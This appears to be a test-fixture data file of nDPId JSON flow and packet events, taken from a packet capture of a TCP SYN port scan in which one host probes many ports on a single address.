+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1131,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060182,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1112,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1131,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1122,"flow_packet_id":1,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060182,"pkt":"ACYLMQczACWzv5HuCABFAAAssb8AACcGb7OsEAAIQA2GNIzTBFjdU4MZAAAAAGACEAAkNAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1132,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060182,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1132,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1123,"flow_packet_id":1,"flow_last_seen":1278275060182,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060182,"pkt":"ACYLMQczACWzv5HuCABFAAAsbzUAADkGoD2sEAAIQA2GNIzTAJDdU4MZAAAAAGACCAAv\/AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1133,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1133,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1124,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAsBpUAAC4GE96sEAAIQA2GNIzTDUzdU4MZAAAAAGACDAAfQAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1134,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1533,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1134,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1125,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAsewcAADYGl2usEAAIQA2GNIzTBf3dU4MZAAAAAGACDAAmjwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1135,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1117,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1135,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1126,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAsb+sAACUGs4esEAAIQA2GNIzTBF3dU4MZAAAAAGACCAAsLwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1136,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1136,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1127,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAseUEAADgGlzGsEAAIQA2GNIzTA\/PdU4MZAAAAAGACBAAwmQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1137,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3325,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1137,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1128,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAs8aMAAC0GKc+sEAAIQA2GNIzTDP3dU4MZAAAAAGACCAAjjwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1138,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1138,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1129,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAspQgAADgGa2qsEAAIQA2GNIzTw1HdU4MZAAAAAGACBABxOgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1139,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1217,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1139,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1130,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAsnykAADoGb0msEAAIQA2GNIzTBMHdU4MZAAAAAGACDAAnywAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1140,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1062,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1140,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1131,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAsYsgAADAGtaqsEAAIQA2GNIzTBCbdU4MZAAAAAGACBAAwZgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1141,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1141,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1132,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAsBCoAADcGDUmsEAAIQA2GNIzTJR\/dU4MZAAAAAGACEAADbQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1142,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1142,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1133,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAsqo8AACgGdeOsEAAIQA2GNIzTF27dU4MZAAAAAGACBAAdHgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1143,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060225,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1143,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1134,"flow_packet_id":1,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060225,"pkt":"ACYLMQczACWzv5HuCABFAAAsdGkAADkGmwmsEAAIQA2GNIzTIyrdU4MZAAAAAGACCAANYgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1144,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":524,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1144,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1135,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsMAkAADMG5WmsEAAIQA2GNIzSAgzdUoMYAAAAAGACEAAmgwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1145,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1145,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1136,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsuKkAAC0GYsmsEAAIQA2GNIzSE+zdUoMYAAAAAGACCAAcowAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1146,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1146,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1137,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsn50AADoGbtWsEAAIQA2GNIzSBEPdUoMYAAAAAGACDAAoTAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1147,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1147,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1138,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsP3kAADcG0fmsEAAIQA2GNIzSOpjdUoMYAAAAAGACEADt9gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1148,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1148,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1139,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsaQ4AAC4GsWSsEAAIQA2GNIzSABPdUoMYAAAAAGACDAAsfAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1149,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2042,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1149,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1140,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsxlsAADgGShesEAAIQA2GNIzSB\/rdUoMYAAAAAGACBAAslQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1150,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1138,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1150,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1141,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsOUgAAC8G4CqsEAAIQA2GNIzSBHLdUoMYAAAAAGACEAAkHQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1151,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5960,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1151,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1142,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAshl8AADYGjBOsEAAIQA2GNIzSF0jdUoMYAAAAAGACDAAVRwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1152,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1152,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1143,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAshqYAACwGlcysEAAIQA2GNIzSCGDdUoMYAAAAAGACBAAsLwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1153,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1153,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1144,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsrlkAADsGXxmsEAAIQA2GNIzSBFLdUoMYAAAAAGACEAAkPQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1154,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4446,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1154,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1145,"flow_packet_id":1,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060226,"pkt":"ACYLMQczACWzv5HuCABFAAAsP9EAAC4G2qGsEAAIQA2GNIzSEV7dUoMYAAAAAGACDAAbMQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1155,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060226,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5432,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 